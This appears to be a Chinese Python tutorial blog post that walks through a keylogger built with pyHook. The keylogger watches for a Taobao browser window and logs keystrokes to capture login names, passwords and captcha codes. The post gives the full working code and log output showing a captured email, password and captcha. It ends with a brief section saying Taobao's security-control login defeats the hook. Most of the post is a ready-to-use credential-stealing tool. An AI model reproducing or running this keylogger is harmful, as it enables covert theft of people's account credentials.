在昨天的文章[《Python:监控键盘输入、鼠标操作,并将捕获到的信息记录到文件中》](http://blog.csdn.net/dyx1024/article/details/7311013)中,我们实现了将用户输入记录到文件的功能,今天看看这一功能的实际应用。
### 一、实现思路:
1、判断当前用户操作的窗口,如果窗口是淘宝网的页面,则开始监控。
2、将用户在淘宝上的所有输入全部记录下来,通常这些记录中会包括用户登陆时的用户名、密码,电话、邮箱等敏感信息。
### 二、代码实现:
~~~
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pythoncom
import pyHook
import time
import logging
import logging.config
#日志配置文件名
LOG_FILENAME = 'hook_logging.conf'
#日志语句提示信息
LOG_CONTENT_NAME = 'taobao_input_msg'
def log_init(log_config_filename, logname):
'''
Function:日志模块初始化函数
Input:log_config_filename:日志配置文件名
lognmae:每条日志前的提示语句
Output: logger
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-02-13
'''
logging.config.fileConfig(log_config_filename)
logger = logging.getLogger(logname)
return logger
def onMouseEvent(event):
'''
Function:处理鼠标左键单击事件,如果当前MSG中存放了信息,
将其写入文件,因为有的用户在输入 完用户名后,不是使用TAB键切换到密码
框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯,
所以此处要判断是否通过鼠标切换了输入窗口
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
'''
global MSG
if len(MSG) != 0:
hook_logger.info('current page:%s' % event.WindowName)
hook_logger.error('information:%s' % MSG)
MSG = ''
return True
def onKeyboardEvent(event):
"处理键盘事件"
'''
Function:处理键盘事件,如果当前窗口为TAOBAO页面,刚开始监控并记录用户输入
因为此时用户可能准备输入用户名及密码进行登陆,所以将用户输入的所有可见
的ascii字符记录下来,此处要考虑用户是否使用了TAB键或回车键来
结束输入,此时要将信息记录到日志中。
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
'''
global MSG
if event.WindowName.decode('GBK').find(u"淘宝") != -1:
if (127 >= event.Ascii > 31) or (event.Ascii == 8):
MSG += chr(event.Ascii)
hook_logger.info('ascii:%d(%s)' % (event.Ascii, str(event.Key)))
if (event.Ascii == 9) or (event.Ascii == 13):
hook_logger.info('current page:%s' % event.WindowName)
hook_logger.error('information:%s' % MSG)
MSG = ''
return True
if __name__ == "__main__":
'''
Function:获取TAOBAO账号及密码
Input:NONE
Output: NONE
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
'''
#打开日志文件
#初始化日志系统
hook_logger = log_init(LOG_FILENAME, LOG_CONTENT_NAME)
MSG = ''
#创建hook句柄
hm = pyHook.HookManager()
#监控鼠标
hm.SubscribeMouseLeftDown(onMouseEvent)
hm.HookMouse()
#监控键盘
hm.KeyDown = onKeyboardEvent
hm.HookKeyboard()
#循环获取消息
pythoncom.PumpMessages()
~~~
### 三、测试
步骤:
1、打开taobao页面,输入用户名及密码,并登陆,窗口截图如下:
![](https://box.kancloud.cn/2016-06-08_5757935768ad7.gif)
2、看看后台日志文件taobao_log.log中的内容:
~~~
[2012-03-03 09:03:20,812 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 09:03:21,155 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 09:03:22,453 taobao_input_msg]INFO: ascii:99(C)
[2012-03-03 09:03:23,046 taobao_input_msg]INFO: ascii:114(R)
[2012-03-03 09:03:23,280 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 09:03:23,608 taobao_input_msg]INFO: ascii:116(T)
[2012-03-03 09:03:23,890 taobao_input_msg]INFO: ascii:101(E)
[2012-03-03 09:03:24,828 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 09:03:25,875 taobao_input_msg]INFO: ascii:64(2)
[2012-03-03 09:03:26,921 taobao_input_msg]INFO: ascii:103(G)
[2012-03-03 09:03:27,312 taobao_input_msg]INFO: ascii:109(M)
[2012-03-03 09:03:27,515 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 09:03:27,733 taobao_input_msg]INFO: ascii:105(I)
[2012-03-03 09:03:27,953 taobao_input_msg]INFO: ascii:108(L)
[2012-03-03 09:03:29,000 taobao_input_msg]INFO: ascii:46(Oem_Period)
[2012-03-03 09:03:29,280 taobao_input_msg]INFO: ascii:99(C)
[2012-03-03 09:03:29,358 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 09:03:29,953 taobao_input_msg]INFO: ascii:109(M)
[2012-03-03 09:03:30,390 taobao_input_msg]INFO: current page:淘宝网 - 淘我喜欢! - Google Chrome
[2012-03-03 09:03:30,390 taobao_input_msg]ERROR: information:socrates@gmail.com
[2012-03-03 09:03:33,140 taobao_input_msg]INFO: ascii:109(M)
[2012-03-03 09:03:33,467 taobao_input_msg]INFO: ascii:121(Y)
[2012-03-03 09:03:34,358 taobao_input_msg]INFO: ascii:95(Oem_Minus)
[2012-03-03 09:03:35,030 taobao_input_msg]INFO: ascii:112(P)
[2012-03-03 09:03:35,328 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 09:03:35,703 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 09:03:35,875 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 09:03:36,280 taobao_input_msg]INFO: ascii:119(W)
[2012-03-03 09:03:36,733 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 09:03:37,030 taobao_input_msg]INFO: ascii:114(R)
[2012-03-03 09:03:37,421 taobao_input_msg]INFO: ascii:100(D)
[2012-03-03 09:03:38,937 taobao_input_msg]INFO: ascii:64(2)
[2012-03-03 09:03:40,015 taobao_input_msg]INFO: ascii:116(T)
[2012-03-03 09:03:40,280 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 09:03:40,500 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 09:03:41,030 taobao_input_msg]INFO: ascii:98(B)
[2012-03-03 09:03:41,265 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 09:03:41,421 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 09:03:43,405 taobao_input_msg]INFO: current page:None
[2012-03-03 09:03:43,405 taobao_input_msg]ERROR: information:my_password@taobao
[2012-03-03 09:03:45,765 taobao_input_msg]INFO: ascii:83(S)
[2012-03-03 09:03:46,140 taobao_input_msg]INFO: ascii:75(K)
[2012-03-03 09:03:47,000 taobao_input_msg]INFO: ascii:55(7)
[2012-03-03 09:03:48,030 taobao_input_msg]INFO: ascii:87(W)
[2012-03-03 09:03:52,233 taobao_input_msg]INFO: current page:None
[2012-03-03 09:03:52,233 taobao_input_msg]ERROR: information:SK7W
~~~
上面的日志中,我将用户每次的按键用info级别保存下来,当用户输入完成后,将合并后的串以ERROR级别打印出来,如果你不需要输入info级别,只需要修改日志配置文件设置打印级别高于info即可,记录日志这块的内容可见文章[《Python:日志模块logging的应用》](http://blog.csdn.net/dyx1024/article/details/7250828)。之所以打印是为和合并后的串进行校验,并且如果用户输入过程中出现错误,使用退格键删除,可以通过ascii码识别出,从日志中可以看到,有三个关键性信息:
[2012-03-03 09:03:30,390 taobao_input_msg]ERROR: information:socrates@gmail.com
[2012-03-03 09:03:43,405 taobao_input_msg]ERROR: information:my_password@taobao
[2012-03-03 09:03:52,233 taobao_input_msg]ERROR: information:SK7W
以上三条ERROR日志分别对应了我输入的用户名、密码(仅仅是个测试)、验证码。
四、我们应该怎么做?
从上面的实验可以看出,如果有人在我们电脑中植入了这样一个小程序,有可能会获取到一些敏感数据,应该如何避免呢,淘宝其实已经想好了,就是在登录时,只需要将“安全控件登陆”这个选项勾上,这样键盘的输入将不会被hook住。再次测试如下:
1、输入不变,只是勾选“安全控件登陆”,如图:
![](https://box.kancloud.cn/2016-06-08_5757935787aa3.gif)
看看这次的日志信息:
~~~
[2012-03-03 09:12:11,562 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 09:12:12,187 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 09:12:12,733 taobao_input_msg]INFO: ascii:99(C)
[2012-03-03 09:12:13,217 taobao_input_msg]INFO: ascii:114(R)
[2012-03-03 09:12:13,530 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 09:12:13,890 taobao_input_msg]INFO: ascii:116(T)
[2012-03-03 09:12:14,125 taobao_input_msg]INFO: ascii:101(E)
[2012-03-03 09:12:14,390 taobao_input_msg]INFO: ascii:115(S)
[2012-03-03 09:12:15,655 taobao_input_msg]INFO: ascii:64(2)
[2012-03-03 09:12:16,375 taobao_input_msg]INFO: ascii:103(G)
[2012-03-03 09:12:16,717 taobao_input_msg]INFO: ascii:109(M)
[2012-03-03 09:12:16,796 taobao_input_msg]INFO: ascii:97(A)
[2012-03-03 09:12:16,953 taobao_input_msg]INFO: ascii:105(I)
[2012-03-03 09:12:17,155 taobao_input_msg]INFO: ascii:108(L)
[2012-03-03 09:12:17,750 taobao_input_msg]INFO: ascii:46(Oem_Period)
[2012-03-03 09:12:17,967 taobao_input_msg]INFO: ascii:99(C)
[2012-03-03 09:12:18,078 taobao_input_msg]INFO: ascii:111(O)
[2012-03-03 09:12:18,233 taobao_input_msg]INFO: ascii:109(M)
[2012-03-03 09:12:18,671 taobao_input_msg]INFO: current page:淘宝网 - 淘我喜欢! - Windows Internet Explorer
[2012-03-03 09:12:18,671 taobao_input_msg]ERROR: information:socrates@gmail.com
[2012-03-03 09:12:30,530 taobao_input_msg]INFO: ascii:101(E)
[2012-03-03 09:12:32,546 taobao_input_msg]INFO: ascii:54(6)
[2012-03-03 09:12:33,717 taobao_input_msg]INFO: ascii:104(H)
[2012-03-03 09:12:34,592 taobao_input_msg]INFO: ascii:56(8)
[2012-03-03 09:12:40,828 taobao_input_msg]INFO: current page:None
[2012-03-03 09:12:40,828 taobao_input_msg]ERROR: information:e6h8
~~~
可以看出,在密码框中输入的内容没有被记录下来。
### 五、总结
从上面的实验可以看出,登录方式设计的重要性,如果对安全性考虑不足,这块很容易被利用。对于用户来说,在我们登录一些涉及个人敏感数据的网站时,最好安装上网站提供的安全插件,再者,在输入时采用软键盘等均可以避免输入被监控。
- 前言
- Python:实现文件归档
- Pyhon:按行输出文件内容
- Python:读文件和写文件
- Python:实现一个小算法
- Python:通过命令行发送新浪微博
- Python:通过摄像头实现的监控功能
- Python:通过摄像头抓取图像并自动上传至新浪微博
- Python:简单的摄像头程序实现
- Python:日志模块logging的应用
- Python:操作嵌入式数据库SQLite
- Python:将句子中的单词全部倒排过来,但单词的字母顺序不变
- Python:语音处理,实现在线朗读RFC文档或本地文本文件
- Python:通过计算阶乘来学习lambda和reduce这两个函数的使用
- Python:通过执行100万次打印来比较C和python的性能,以及用C和python结合来解决性能问题的方法
- Python:使用matplotlib绘制图表
- Python:使用pycha快速绘制办公常用图(饼图、垂直直方图、水平直方图、散点图等七种图形)
- Python:使用pycha快速绘制办公常用图二(使用样式定制个性化图表)
- Python:监控键盘输入、鼠标操作,并将捕获到的信息记录到文件中
- Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性
- Python:通过获取淘宝账号和密码的实验,来看登陆方式选择的重要性(二)
- Python:通过远程监控用户输入来获取淘宝账号和密码的实验(一)
- Python:通过远程监控用户输入来获取淘宝账号和密码的实验(二)
- Python:通过自定义系统级快捷键来控制程序运行
- Python:通过自定义系统级快捷键来控制程序开始或停止记录日志(使用小技巧解决一个貌似无解的问题)
- Python:一个多功能的抓图工具开发(附源码)
- Python:程序发布方式简介一(打包为可执行文件EXE)
- Python:新浪微博应用开发简介(认证及授权部分)
- Python:程序最小化到托盘功能实现
- Python:实用抓图工具开发介绍(含需求分析、设计、编码、单元测试、打包、系统测试、发布各环节)
- Python:桌面气泡提示功能实现
- Python:未来三个月的python学习计划
- Python:pygame模块及SDL库简介
- Python:获取新浪微博用户的收听列表和粉丝列表
- Python:pygame游戏编程之旅一(Hello World)
- Python:pygame游戏编程之旅二(自由移动的小球)
- Python:pygame游戏编程之旅三(玩家控制的小球)
- Python:pygame游戏编程之旅四(游戏界面文字处理)
- Python:pygame游戏编程之旅五(游戏界面文字处理详解)
- Python:pygame游戏编程之旅六(游戏中的声音处理)
- Python:pygame游戏编程之旅七(pygame基础知识讲解1)
- Python:编程“八荣八耻”之我见
- Python:脚本的几种执行方式
- wxPython:简单的wxPython程序
- wxPython:简单的wxPython程序的另一种写法
- wxPython:应用程序对象介绍
- wxPython:输出重定向
- wxPython:关闭wxPython程序
- wxPython:Frame类介绍
- wxPython:面板Panel的使用
- wxPython:工具栏、状态栏、菜单实现
- wxPython:消息对话框MessageDialog
- wxPython:文本对话框TextEntryDialog
- wxPython:列表选择框SingleChoiceDialog
- wxPython:事件处理介绍一
- wxPython:事件处理介绍二
- wxPython: 简单的绘图例子
- wxPython:状态栏介绍
- wxPython:菜单介绍
- wxPython:文件对话框wx.FileDialog
- wxPython:颜色选择对话框wx.ColourDialog
- wxPython:布局管理器sizer介绍
- wxPython:启动画面SplashScreen介绍
- wxPython:绘画按钮BitmapButton介绍
- wxPython:进度条Gauge介绍
- Python: 发送新浪微博(使用oauth2)
- Python:读取新浪微博收听列表
- Python:DNS客户端实现